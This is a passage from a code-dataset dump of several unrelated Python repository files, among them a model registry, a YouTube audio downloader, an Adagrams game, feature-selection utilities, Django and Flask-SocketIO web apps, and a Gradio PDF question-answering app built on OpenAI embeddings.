model.\n\n 
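Unknown model names resolve to None rather than raising an exception.\n\n        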
:param model: Model name\n        :type model: str\n        :returns: Name of the model identity property or None\n        :rtype: str|None\n        \"\"\"\n        klass = self.models.get(model)\n        if klass is None:\n            return None\n        return klass.identity_property\n\n    def state_properties(self, model):\n        \"\"\"Return the state properties of a targeted model\n\n        :param model: Model name\n        :type model: str\n        :returns: List of state properties or None\n        :rtype: list|None\n        \"\"\"\n        klass = self.models.get(model)\n        if klass is None:\n            return None\n        return sorted(klass.state_properties)\n\n    def static_properties(self, model):\n        \"\"\"Return the static properties of a model\n\n        :param model: Model name\n        :type model: str\n        :returns: List of static properties or None\n        :rtype: list|None\n        \"\"\"\n        klass = self.models.get(model)\n        if klass is None:\n            return None\n        return sorted(klass.static_properties)\n\n    def children(self, model):\n        \"\"\"Return the children of a model\n\n        :param model: Model name\n        :type model: str\n        :returns: List of children model names or None\n        :rtype: list|None\n        \"\"\"\n        klass = self.models.get(model)\n        if klass is None:\n            return None\n        return list(klass.children.keys())\n\n    def modeldict(self, model):\n        \"\"\"Return a JSON-serializable dict describing the model.\n\n        :param model: Name of the model\n        :type model: str\n        :returns: Dict describing model\n        :rtype: dict|None\n        \"\"\"\n        klass = self.models.get(model)\n        if klass is None:\n            return None\n\n        children = {}\n        for name, childtuple in klass.children.items():\n            children[name] = {\n                'rel_name': childtuple[0],\n                'label': childtuple[1].label\n            }\n        return dict(\n            label=klass.label,\n            state_label=klass.label,\n            identity=klass.identity_property,\n            static_properties=klass.static_properties,\n            state_properties=klass.state_properties,\n            children=children\n        )\n\n    def modeldicts(self):\n        \"\"\"Get a list of all model dicts.\n\n        :returns: List of model dicts\n        :rtype: list\n        \"\"\"\n        dicts = []\n        for model in self.models.keys():\n            dicts.append(self.modeldict(model))\n        return sorted(dicts, key=lambda x: x.get('label'))\n\n    def properties(self, model=None):\n        \"\"\"Gather list of properties for all models or a single model.\n\n        :param model: Name of a targeted model\n        :type model: str\n        :returns: List of properties.\n        :rtype: list\n        \"\"\"\n        prop_set = set()\n\n        if model is None:\n            models = self.models.keys()\n        else:\n            models = [model]\n\n        for model in models:\n            klass = self.models.get(model)\n            if klass is not None:\n                prop_set.add(klass.identity_property)\n                for prop in klass.static_properties:\n                    prop_set.add(prop)\n                for prop in klass.state_properties:\n                    prop_set.add(prop)\n\n        return sorted(list(prop_set))\n\n    def path(self, label):\n        \"\"\"Get path of a label within forest.\n\n        :param label: Model label\n        :type label: str\n        :returns: List of (label, relationship name) tuples\n        :rtype: list|None\n        \"\"\"\n        return self.forest.path(label)\n","repo_name":"absalon-james/cloud_snitch","sub_path":"cloud_snitch/models/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"74229477282","text":"from youtube_dl import YoutubeDL\n\naudio_downloader = YoutubeDL({'format': 'bestaudio'})\n\nwhile True:\n\n    try:\n        print('Youtube Downloader'.center(40, '_'))\n        URL = input('Enter youtube url : ')\n        audio_downloader.extract_info(URL)\n    except Exception:\n        print(\"Couldn\\'t download the audio\")\n    finally:\n        option = int(input('\\n1.download again 
\n2.Exit\n\nOption here :'))\n\n        if option != 1:\n            break\n","repo_name":"python-geeks/Automation-scripts","sub_path":"music_downloader/music-downloader.py","file_name":"music-downloader.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"}
{"seq_id":"41865571599","text":"# Compute the total amount needed to buy a car with all of the given options.\n\n# The first line contains the number of test cases.\n# The first line of each test case gives the price s of the car. (1 ≤ s ≤ 100 000)\n# The second line gives the number n of distinct options Haebin wants to buy. (0 ≤ n ≤ 1 000)\n# Then n more lines of input follow.\n# Each line consists of q and p, where q is the quantity of a particular option Haebin wants to buy and p is the price of that option. (1 ≤ q ≤ 100, 1 ≤ p ≤ 10 000)\n\nT = int(input())\n\nfor _ in range(T):\n    s = int(input())\n    n = int(input())\n    price = s\n\n    for _ in range(n):\n        q, p = map(int, input().split())\n        price += q * p\n\n    print(price)\n","repo_name":"IDU-IFP/ifp-2022-restart-ok","sub_path":"soyiyeon/백준_9325번문제.py","file_name":"백준_9325번문제.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"17680139307","text":"import random\n\nLETTER_POOL = {\n    'A': 9, \n    'B': 2, \n    'C': 2, \n    'D': 4, \n    'E': 12, \n    'F': 2, \n    'G': 3, \n    'H': 2, \n    'I': 9, \n    'J': 1, \n    'K': 1, \n    'L': 4, \n    'M': 2, \n    'N': 6, \n    'O': 8, \n    'P': 2, \n    'Q': 1, \n    'R': 6, \n    'S': 4, \n    'T': 6, \n    'U': 4, \n    'V': 2, \n    'W': 2, \n    'X': 1, \n    'Y': 2, \n    'Z': 1\n}\n\nLETTER_VALUES = {\n    'A': 1, \n    'B': 3, \n    'C': 3, \n    'D': 2, \n    'E': 1, \n    'F': 4, \n    'G': 2, \n    'H': 4, \n    'I': 1, \n    'J': 8, \n    'K': 5, \n    'L': 1, \n    'M': 3, \n    'N': 1, \n    'O': 1, \n    'P': 3, \n    'Q': 10, \n    'R': 1, \n    'S': 1, \n    'T': 1, \n    'U': 1, \n    'V': 4, \n    'W': 4, \n    'X': 8, \n    'Y': 4, \n    'Z': 10 \n}\n\ndef draw_letters():\n    '''\n    (1-1) create letter bank from LETTER_POOL\n    (1-2) letter cannot repeat greater than quantity of LETTER_POOL\n    '''\n\n    letters = []\n    while len(letters) < 10:\n        letter = random.choice(list(LETTER_POOL.keys()))\n        if letters.count(letter) < LETTER_POOL[letter]:\n            letters.append(letter)\n    return letters\n\ndef uses_available_letters(word, letter_bank):\n    '''\n    (1) read letter from word (in list) from user\n    (2) read letter_bank from the output of draw_letters()\n    (3) check if each letter in the letter_bank\n    '''\n\n    letters = letter_bank.copy()\n    word = word.upper()\n    for letter in word:\n        if letter in letters:\n            letters.remove(letter)\n            continue\n        else:\n            return False\n    return True\n\ndef score_word(word):\n    '''\n    (1) letter in word\n    (2) get the value from LETTER_VALUES (in dict)\n    (3) add each value to score\n    '''\n\n    score = 0\n    word = word.upper()\n    for letter in word:\n        score += LETTER_VALUES[letter]\n    \n    if len(word) > 6:\n        score += 8\n\n    return score\n\ndef get_highest_word_score(word_list):\n    '''\n    (1) dictionay of word:score\n    (2) get word(s) in dict with highest score\n    (3) convert (2) into tuple (requirement!)\n    (4) list of multiple max scored words\n    (5-1) if (4) is single: return the tuple of max scored word \n    (5-2) if (4) is multiple: return winner\n    (5-2-a) winner rule for multiple: with fewest number of letters unless 10 letters \n            or if words have same number, then return first occurrence\n    '''\n\n    words_with_scores = {}\n    for word in word_list:\n        score = score_word(word)\n        words_with_scores[word] = score\n    \n    highest_score_word = max(words_with_scores,key=words_with_scores.get) \n    high_score = words_with_scores[highest_score_word]\n\n    
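# Added commentary: everything below implements the docstring's tie-breaking\n    # rules -- collect every word that reached the top score, prefer a\n    # 10-letter word, otherwise the fewest letters, falling back to the first\n    # occurrence.\n    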
max_score_tuple = (highest_score_word, words_with_scores[highest_score_word])\n    \n    multiple_max_score_words = []\n    for key in words_with_scores:\n        if high_score == words_with_scores[key]:\n            multiple_max_score_words.append(key)\n\n    if len(multiple_max_score_words) == 1:\n        return max_score_tuple\n\n    current_winner = (multiple_max_score_words[0], high_score)\n    for word in multiple_max_score_words:\n        if len(word) == 10:\n            return (word, high_score)\n        if len(word) < len(current_winner[0]):\n            current_winner = (word, high_score)\n\n    return current_winner \n","repo_name":"1lynnj/adagrams-py","sub_path":"adagrams/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"}
{"seq_id":"6595760278","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.linear_model import (\n    Ridge,\n    RidgeCV,\n    ElasticNet,\n    LassoCV,\n    LassoLarsCV,\n    LogisticRegression,\n)\nfrom sklearn.model_selection import cross_val_score\nfrom tqdm import tqdm\n\n\ndef pca_feature(train_feature, test_feature, n_components):\n    pca = PCA(n_components=n_components)\n    pca.fit(train_feature)\n    train_feature_ = pd.DataFrame(\n        pca.transform(train_feature),\n        columns=[\"PCA_%s\" % (i + 1) for i in range(n_components)],\n    )\n    test_feature_ = pd.DataFrame(\n        pca.transform(test_feature),\n        columns=[\"PCA_%s\" % (i + 1) for i in range(n_components)],\n    )\n    return train_feature_, test_feature_, pca\n\n\ndef lasso_feature(train_feature, test_feature, train_label, C):\n    model_lasso = LogisticRegression(\n        penalty=\"l1\",\n        solver=\"liblinear\",\n        tol=1e-6,\n        max_iter=int(1e6),\n        warm_start=True,\n        intercept_scaling=10000.0,\n        C=C,\n    )\n    model_lasso.fit(train_feature, train_label)\n    coef = pd.Series(np.abs(model_lasso.coef_.ravel().copy()), index=train_feature.columns)\n    feature_columns = list(coef[coef != 0].index)\n    return train_feature[feature_columns], test_feature[feature_columns], model_lasso\n\n\ndef iv_feature(\n    train_feature,\n    test_feature,\n    train_label,\n    interval_dict,\n    cr_threshold,\n    n_feature=None,\n):\n    except_columns = []\n    iv_dict = {}\n    for column in tqdm(train_feature.columns):\n        iv, IV, WOE, N_0_group, N_1_group = CalcIV(train_feature[column], train_label)\n        try:\n            intervals = interval_dict[column]\n        except KeyError:\n            except_columns.append(column)\n            intervals = np.unique(train_feature[column])\n\n        iv_dict[column] = {\"iv\": iv}\n        if len(intervals) > len(N_1_group):\n            intervals = intervals[-len(N_1_group) :]\n        for i in range(len(intervals)):\n            iv_dict[column][\"Bin%s\" % i] = {\n                \"range\": intervals[i],\n                \"positive\": N_1_group[i],\n                \"negative\": N_0_group[i],\n                \"WOE\": WOE[i],\n                \"IV\": IV[i],\n            }\n\n    print(\"there are %s columns not in interval_dict\" % len(except_columns))\n    print(except_columns)\n    # there must be some calculation for this xxxx\n    pd.DataFrame(iv_dict[column]).to_csv(\"../data/Bins/%s.csv\" % column)\n    iv_df = pd.DataFrame(\n        [{\"name\": key, \"IV\": value[\"iv\"]} for key, value in iv_dict.items()]\n    )\n    iv_df = iv_df.sort_values(\"IV\", ascending=False)\n    cor_df = train_feature.corr()\n    delete_high_corr_columns = []\n    for column in iv_df[\"name\"]:\n        if column not in delete_high_corr_columns:\n            for column2 in 
iv_df[\"name\"]:\n if (\n cor_df.loc[column, column2] > 0.8\n and column != column2\n and column2 not in delete_high_corr_columns\n ):\n delete_high_corr_columns.append(column2)\n key_feature = []\n for name in iv_df[\"name\"]:\n if len(key_feature) >= 20:\n break\n if name not in delete_high_corr_columns:\n key_feature.append(name)\n return train_feature[key_feature], test_feature[key_feature], key_feature, iv_dict\n\n\ndef CalcIV(Xvar, Yvar):\n Xvar = Xvar.fillna(Xvar.mean())\n x_unique = np.unique(Xvar)\n N_0 = np.sum(Yvar == 0)\n N_1 = np.sum(Yvar == 1)\n N_0_group = np.zeros(x_unique.shape)\n N_1_group = np.zeros(x_unique.shape)\n for i in range(len(x_unique)):\n N_0_group[i] = Yvar[(Xvar == x_unique[i]) & (Yvar == 0)].count() + 1\n N_1_group[i] = Yvar[(Xvar == x_unique[i]) & (Yvar == 1)].count() + 1\n WOE = np.log((N_0_group / N_0) / (N_1_group / N_1))\n IV = (N_0_group / N_0 - N_1_group / N_1) * WOE\n iv = np.sum(IV)\n return iv, IV, WOE, N_0_group, N_1_group\n","repo_name":"SmartDataLab/DefaultPredict","sub_path":"src/feature/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72692674080","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n/*\n@author:sun\n@file:test_TS_SR_position_approve_10.py\n@time:2021/09/01\n*/\n\n岗位关闭后,继续审批提交的岗位申请,申请失败\n\n\"\"\"\n\nimport allure\nimport pytest\n\nfrom FastApi.aws.project import Project, Personnel\nfrom FastApi.aws.recruitment import Recruitment\nfrom FastApi.common.logs_handle import Logger\nfrom FastApi.conf import env\nfrom FastApi.scripts.conftest import projectName, postName\n\nlog = Logger().logger\npro = Project()\nrecruit = Recruitment()\nperson_1 = Personnel(projectName, userName=env.USERNAME_PM)\n\n\ndef setup_module(module):\n log.info('-----测试用例预制-----')\n\n\n@pytest.mark.usefixtures('open_init_position')\n@allure.feature('项目招聘')\n@allure.story('岗位审批')\n@allure.title('岗位关闭后,继续审批提交的岗位申请,申请失败')\ndef test_approve():\n \"\"\"\n 前置条件:\n 1- 创建招募岗位,并打开岗位\n 2- 关闭招募岗位\n\n\n 测试步骤:\n 1- 开发人员查看关闭的招募岗位\n\n 预期结果:\n 1- 无法查看\n \"\"\"\n log.info('-----测试用例执行-----')\n\n # 关闭岗位开关\n person_1.operate_recruit(postName, openFlag=False)\n\n # 开发人员查询岗位\n resp = recruit.query_position_by_project(postName, projectName, userName=env.USERNAME_RD_Recruit_1)\n pytest.assume(not resp) # 开发人员无法查看已关闭岗位\n\n\ndef teardown_module(module):\n log.info('-----环境操作-----')\n","repo_name":"nick102401/TaskForce","sub_path":"FastApi/scripts/features/recruitment/positions_approve/test_TS_SR_position_approve_10.py","file_name":"test_TS_SR_position_approve_10.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38689122826","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\n# Create your views here.\nfrom .models import Categoria, Producto\n\ndef index(request):\n \n categorias= Categoria.objects.order_by('nombre')\n if request.method == 'POST':\n id_categoria= request.POST.get('categoria_id')\n if id_categoria != 'null':\n product_list= Producto.objects.filter(categoria_id=id_categoria) \n else:\n product_list= Producto.objects.order_by('nombre')\n else:\n product_list= Producto.objects.order_by('nombre')\n \n context= {'product_list': product_list, 'categorias': categorias}\n return render(request, 'product/index.html', context)\n\ndef create(request):\n categorias= 
Categoria.objects.order_by('nombre')\n context = {'categorias': categorias}\n return render(request, 'product/create.html', context)\n\ndef store(request):\n if request.method == 'POST':\n categoria_id= int(request.POST.get('id_categoria'))\n nombre= request.POST.get('nombre')\n precio= request.POST.get('precio')\n stock= request.POST.get('stock')\n upload= request.POST.get('upload')\n pub_date= '2023-10-13'\n \n Producto.objects.create(\n categoria_id= categoria_id,\n nombre= nombre,\n precio= precio,\n stock= stock,\n upload= upload,\n pub_date= pub_date\n )\n return redirect('index')\n return HttpResponse('ERROR')\n\ndef show(request, id= None):\n producto= Producto.objects.get(id= id)\n \n if producto.stock < 10:\n color= 'text-danger'\n else:\n color= 'text-primary'\n\n context= {\n 'producto': producto,\n 'colorstock': color\n }\n return render(request, 'product/show.html', context)\n \ndef edit(request, id= None):\n categorias= Categoria.objects.order_by('nombre')\n producto= Producto.objects.get(id= id)\n context= {'producto': producto, 'categorias': categorias}\n return render(request, 'product/edit.html', context)\n\n\ndef update(request, id= None):\n if request.method == 'POST':\n categoria_id= int(request.POST.get('id_categoria'))\n nombre= request.POST.get('nombre')\n precio= request.POST.get('precio')\n stock= request.POST.get('stock')\n upload= request.POST.get('upload')\n pub_date= '2023-10-13'\n \n producto= Producto.objects.get(id= id)\n producto.categoria_id= categoria_id\n producto.nombre= nombre\n producto.precio= precio\n producto.stock= stock\n producto.upload= upload\n producto.pub_date= pub_date\n producto.save()\n \n return redirect('index')\n return HttpResponse('ERROR')","repo_name":"adrian-coronel/laboratorio06-django","sub_path":"aplicacion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74322081762","text":"from flask import Flask, send_from_directory, request, jsonify\nfrom flask_socketio import SocketIO, emit, join_room\nfrom flask_cors import CORS \nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\nimport datetime\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__, static_folder='../../client/build/static')\napp.config['SECRET_KEY'] = 'development key'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'messages.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nsocket = SocketIO(app)\nCORS(app,resources={r\"/*\":{\"origins\":\"*\"}})\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n@app.route('/')\ndef serve_static_index():\n return send_from_directory('../../client/build/', 'index.html')\n\n\nclass Message(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n room = db.Column(db.String(80))\n author = db.Column(db.String(120))\n body = db.Column(db.String(140))\n timeStamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n\n def __init__(self, room, author, body):\n self.room = room\n self.author = author\n self.body = body\n self.timeStamp = datetime.datetime.utcnow()\n\nclass MessageSchema(ma.Schema):\n class Meta:\n # Fields to expose\n fields = ('room', 'author','body','timeStamp')\n\nmessage_schema = MessageSchema()\nmessages_schema = MessageSchema(many=True)\n\n# endpoint to get user detail by id\n@app.route(\"/user/<id>\", methods=[\"GET\"])\ndef user_detail(id):\n user = 
User.query.get(id)\n    return user_schema.jsonify(user)\n\n# endpoint to create a new message\n@app.route(\"/message\", methods=[\"POST\"])\ndef add_message():\n    room = request.json['room']\n    author = request.json['author']\n    body = request.json['body']\n    new_message = Message(room, author, body)\n    db.session.add(new_message)\n    db.session.commit()\n    return message_schema.jsonify(new_message)\n\n# endpoint to list all messages\n@app.route(\"/message\", methods=[\"GET\"])\ndef get_message():\n    all_messages = Message.query.all()\n    result = messages_schema.dump(all_messages)\n    return jsonify(result.data)\n\n# endpoint to get message detail by id\n@app.route(\"/message/<id>\", methods=[\"GET\"])\ndef message_detail(id):\n    message = Message.query.get(id)\n    return message_schema.jsonify(message)\n\n@socket.on('connect')\ndef on_connect():\n    print('user connected')\n    retrieve_active_users()\n\n\ndef retrieve_active_users():\n    emit('retrieve_active_users', broadcast=True)\n\n\n@socket.on('activate_user')\ndef on_active_user(data):\n    user = data.get('username')\n    emit('user_activated', {'user': user}, broadcast=True)\n\n\n@socket.on('deactivate_user')\ndef on_inactive_user(data):\n    user = data.get('username')\n    emit('user_deactivated', {'user': user}, broadcast=True)\n    print(user, \" user_deactivated\")\n\n\n@socket.on('join_room')\ndef on_join(data):\n    room = data['room']\n    join_room(room)\n    emit('open_room', {'room': room}, broadcast=True)\n    emit('roomJoined', {'room': room}, broadcast=True)\n\n\n@socket.on('send_message')\ndef on_chat_sent(data):\n    room = data['room']\n    emit('message_sent', data, room=room)\n\n@socket.on('broadcast_message')\ndef test_message(data):\n    emit('message_broadcasted', data, broadcast=True)","repo_name":"glaucopater/chatapp","sub_path":"server/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"7981753189","text":"import pandas as pd\nimport numpy as np\n\ntrainData = pd.read_csv(\"dengue_features_train.csv\")\ntrainLabels = pd.read_csv(\"dengue_labels_train.csv\")\ndata = pd.merge(trainData,trainLabels, how = 'outer', on = [\"city\", \"year\",\"weekofyear\"])\n\n# replace date with absolute day number\nfrom datetime import datetime\ndef dateToDay(string):\n    dt = datetime.strptime(string,\"%Y-%m-%d\")\n    first = datetime.strptime(\"1990-04-30\",\"%Y-%m-%d\")\n    delta = dt-first\n    return delta.days\n\ndataTmp = data[\"week_start_date\"].apply(dateToDay)\ndata2 = data\ndata2[\"week_start_date\"] = dataTmp\n\n# replace city names with numbers\ndata2 = data2.replace({\"sj\":0,\"iq\":1})\n\n# add an additional entry to store whether a line contains a corrected value\ndata2[\"corrected_data\"] = 0\n\n# replace nans with interpolated value where possible\nfor row, rowData in data2.iterrows():\n    for col in range(data2.shape[1]):\n        value = rowData.iloc[col]\n        if not pd.notnull(value) :\n            # try to correct value by entries above and below\n            valueAbove = data2.iloc[row-1, col]\n            valueBelow = data2.iloc[row+1, col]\n            if pd.notnull(valueAbove) and pd.notnull(valueBelow):\n                data2.iloc[row,col] = (valueAbove+valueBelow)/2\n                data2.iloc[row,25] = 1 # mark row as modified\n\n\n# remove rows that still have a nan entry\ndata2 = data2[~data2.isnull().any(axis=1)]\n\n# separate into two cities\ndataCity1 = data2[:866]\ndataCity2 = 
data2[866:]\n","repo_name":"dominik31415/dengAI","sub_path":"loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"19850514705","text":"from PIL import Image\nimport sys\nimport codecs\nimport pyocr\nimport pyocr.builders\nfrom bs4 import BeautifulSoup\n\ntool = pyocr.get_available_tools()[0]\nlangs = tool.get_available_languages()\nlang = langs[24]\n# English 24, Korean 57\nbuilder = pyocr.builders.LineBoxBuilder()\nline_boxes = tool.image_to_string(\n    Image.open('final_test.png'),\n    lang=lang,\n    builder=builder\n)\nprint(\"Will use lang '%s'\" % (lang))\n\n\nwith codecs.open(\"toto4_test.html\", 'w', encoding='utf-8') as file_descriptor:\n    builder.write_file(file_descriptor, line_boxes)\nprint(\"hocr export complete\")\n\n#soup = BeautifulSoup(open(\"./toto4_test.html\").decode('utf-8'),\"html.parser\")\nwith open(\"./toto4_test.html\",'rb') as html:\n    soup = BeautifulSoup(html, \"html.parser\")\nprint(\"hocr file opened\")\nmr = soup.find_all(class_=\"ocr_line\")\nsizeLine = len(mr)\ni = 0\nresult=0\nsum=0\nprint(\"beginning detection\")\ntempSize = 0\n\nwhile i<sizeLine:\n    table_temp=mr[i].find_all(class_=\"ocrx_word\")\n    tempSize = len(table_temp)\n    x=0\n    before=0\n    after=0\n    flag = False\n    while x<tempSize:\n        tempStr = str(table_temp[x])\n        if(tempStr[36]==' '):\n            after = 0\n        elif(tempStr[37]==' '):\n            after=int(tempStr[36:37])\n        elif(tempStr[38] == ' '):\n            after=int(tempStr[36:38])\n        else:\n            after=int(tempStr[36:39])\n        if(tempSize<1 and after<100):\n            flag=True\n            break\n        sum+=1\n        if(x==tempSize-1 and after<before):\n            result+=1\n            print(\"this line is upsidedown\")\n        before=after\n        x+=1\n    i+=1\n    print(\"end of line\")\n    del table_temp[:]\n\nfinalResult = (result/sum)*100\nprint(\"finalResult %d\" % finalResult)\n\nif(finalResult>50):\n    print(\"it is upside down!!\")\nelse:\n    print(\"it is alright!!\")","repo_name":"blackbbean/individualStudy1","sub_path":"test1/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"31719948709","text":"import gradio as gr\nimport openai\nimport numpy as np\nfrom time import sleep\nimport tiktoken\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import UnstructuredPDFLoader\n\nCOMPLETIONS_MODEL = \"gpt-3.5-turbo\"\nEMBEDDING_MODEL = \"text-embedding-ada-002\"\n\n# Initialize the OpenAI API\nopenai.api_key = \"YOUR_OPEN_AI_KEY\"\n\n\n# Function to convert a PDF to text\ndef extract_text_from_pdf(pdf_file, progress=gr.Progress()):\n\n    try:\n        reader = UnstructuredPDFLoader(pdf_file.name)\n        data = reader.load()\n        text = data[0].page_content\n\n        text_splitter = RecursiveCharacterTextSplitter(\n            chunk_size=400,\n            chunk_overlap=50,\n            length_function=len,\n        )\n        chunks = text_splitter.create_documents([text])\n\n        embed = compute_doc_embeddings(chunks, progress)\n        return chunks, embed, \"uploaded\"\n    except Exception:\n        return None, None, \"\"\n\n\ndef get_embedding(text, model=EMBEDDING_MODEL):\n    result = openai.Embedding.create(\n        model=model,\n        input=text\n    )\n    return result[\"data\"][0][\"embedding\"]\n\n\ndef compute_doc_embeddings(text, progress):\n    \"\"\"\n    Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n\n    Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n    \"\"\"\n    result = {}\n    for idx in 
progress.tqdm(range(len(text))):\n        try:\n            res = get_embedding(text[idx].page_content)\n        except Exception:\n            done = False\n            while not done:\n                sleep(5)\n                try:\n                    res = get_embedding(text[idx].page_content)\n                    done = True\n                except Exception:\n                    pass\n        result[idx] = res\n\n    return result\n\n\ndef vector_similarity(x, y):\n    \"\"\"\n    Returns the similarity between two vectors.\n\n    Because OpenAI Embeddings are normalized to length 1, the cosine similarity is the same as the dot product.\n    \"\"\"\n    return np.dot(np.array(x), np.array(y))\n\n\ndef order_document_sections_by_query_similarity(query, contexts):\n    \"\"\"\n    Find the query embedding for the supplied query, and compare it against all of the pre-calculated document embeddings\n    to find the most relevant sections.\n\n    Return the list of document sections, sorted by relevance in descending order.\n    \"\"\"\n    query_embedding = get_embedding(query)\n\n    document_similarities = sorted([\n        (vector_similarity(query_embedding, doc_embedding), doc_index) for doc_index, doc_embedding in contexts.items()\n    ], reverse=True)\n\n    return document_similarities\n\n\nSEPARATOR = \"\\n* \"\nENCODING = \"gpt2\"  # encoding for text-davinci-003\n\nencoding = tiktoken.get_encoding(ENCODING)\nseparator_len = len(encoding.encode(SEPARATOR))\nCOMPLETIONS_API_PARAMS = {\n    # We use temperature of 0.0 because it gives the most predictable, factual answer.\n    \"temperature\": 0.0,\n    \"max_tokens\": 300,\n    \"model\": COMPLETIONS_MODEL,\n}\n\n\ndef construct_prompt(question, context_embeddings, df):\n    \"\"\"\n    Fetch the most relevant document sections and assemble the completion prompt.\n    \"\"\"\n    chosen_sections = []\n    chosen_sections_len = 0\n    chosen_sections_indexes = []\n    most_relevant_document_sections = order_document_sections_by_query_similarity(question, context_embeddings)\n\n    if \"email\" in question:\n        MAX_SECTION_LEN = 2500\n        COMPLETIONS_API_PARAMS['max_tokens'] = 1000\n        COMPLETIONS_API_PARAMS['temperature'] = 0.5\n        header = \"\"\"Write email using the provided context \\n\\nContext:\\n \"\"\"\n    elif \"summary\" in question or \"summarize\" in question:\n        MAX_SECTION_LEN = 2500\n        COMPLETIONS_API_PARAMS['max_tokens'] = 1000\n        COMPLETIONS_API_PARAMS['temperature'] = 0.5\n        header = \"\"\"Write detailed summary of the provided context \\n\\nContext:\\n \"\"\"\n        question = \"\"\n    else:\n        MAX_SECTION_LEN = 1000\n        COMPLETIONS_API_PARAMS['max_tokens'] = 300\n        COMPLETIONS_API_PARAMS['temperature'] = 0.0\n        header = \"\"\"Answer the question in detail as truthfully as possible, and if the answer is not contained within the text below, say \"I don't know.\"\\n\\nContext:\\n \"\"\"\n\n    for _, section_index in most_relevant_document_sections:\n        # Add contexts until we run out of space.\n        document_section = df[section_index].page_content\n        chosen_sections_len += len(document_section) * 0.25 + separator_len\n\n        if chosen_sections_len > MAX_SECTION_LEN:\n            break\n\n        chosen_sections.append(SEPARATOR + document_section.replace(\"\\n\", \" \"))\n        chosen_sections_indexes.append(str(section_index))\n\n    # Useful diagnostic information\n    print(f\"Selected {len(chosen_sections)} document sections:\")\n    print(\"\\n\".join(chosen_sections_indexes))\n\n    return header + \"\".join(chosen_sections) + \"\\n\\n Q: \" + question + \"\\n A:\"\n\n\ndef answer_query_with_context(\n        query,\n        df,\n        document_embeddings, history,\n        openchat, show_prompt=True\n):\n    history = history or []\n    prompt = construct_prompt(\n        query,\n        document_embeddings,\n        df\n    )\n\n    if show_prompt:\n        print(prompt)\n    openchat = openchat or [{\"role\": \"system\", \"content\": \"You are a Q&A assistant\"}]\n    
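# Added note: the bulky retrieval-augmented prompt is appended only for this\n    # API call and popped again right below, so the stored chat history keeps\n    # the user's short query plus the assistant's reply instead of the full\n    # context block.\n    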
openchat.append({\"role\": \"user\", \"content\": prompt})\n response = openai.ChatCompletion.create(\n messages=openchat,\n **COMPLETIONS_API_PARAMS\n )\n openchat.pop()\n openchat.append({\"role\": \"user\", \"content\": query})\n print(COMPLETIONS_API_PARAMS)\n output = response[\"choices\"][0][\"message\"][\"content\"].replace('\\n', '<br>')\n openchat.append({\"role\": \"assistant\", \"content\": output})\n history.append((query, output))\n return history, history, openchat, \"\"\n\n\nwith gr.Blocks() as app:\n history_state = gr.State()\n document = gr.Variable()\n embeddings = gr.Variable()\n chat = gr.Variable()\n with gr.Row():\n upload = gr.File(label=None, interactive=True, elem_id=\"short-upload-box\")\n ext = gr.Textbox(label=\"Progress\")\n\n with gr.Row():\n with gr.Column(scale=3):\n chatbot = gr.Chatbot().style(color_map=(\"#075e54\", \"grey\"))\n\n with gr.Row():\n message = gr.Textbox(label=\"What's on your mind??\",\n placeholder=\"What's the answer to life, the universe, and everything?\",\n lines=1)\n submit = gr.Button(value=\"Send\", variant=\"secondary\").style(full_width=False)\n\n upload.change(extract_text_from_pdf, inputs=[upload], outputs=[document, embeddings, ext])\n message.submit(answer_query_with_context, inputs=[message, document, embeddings, history_state, chat],\n outputs=[chatbot, history_state, chat, message])\n submit.click(answer_query_with_context, inputs=[message, document, embeddings, history_state, chat],\n outputs=[chatbot, history_state, chat, message])\nif __name__ == \"__main__\":\n app.queue().launch(server_name=\"0.0.0.0\", debug=True)","repo_name":"vikaskookna/pdfgpt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13014460800","text":"import glob, os\r\nimport argparse\r\n#ap = argparse.ArgumentParser()\r\n#ap.add_argument(\"-d\", \"--dataset\", required=True,\r\n#\thelp=\"path to input dataset\")\r\n#args = vars(ap.parse_args())\r\n\r\nallfiles = glob.glob('*.mp3')\r\nfor afile in allfiles:\r\n os.rename(afile, 't_'+ afile)\r\n 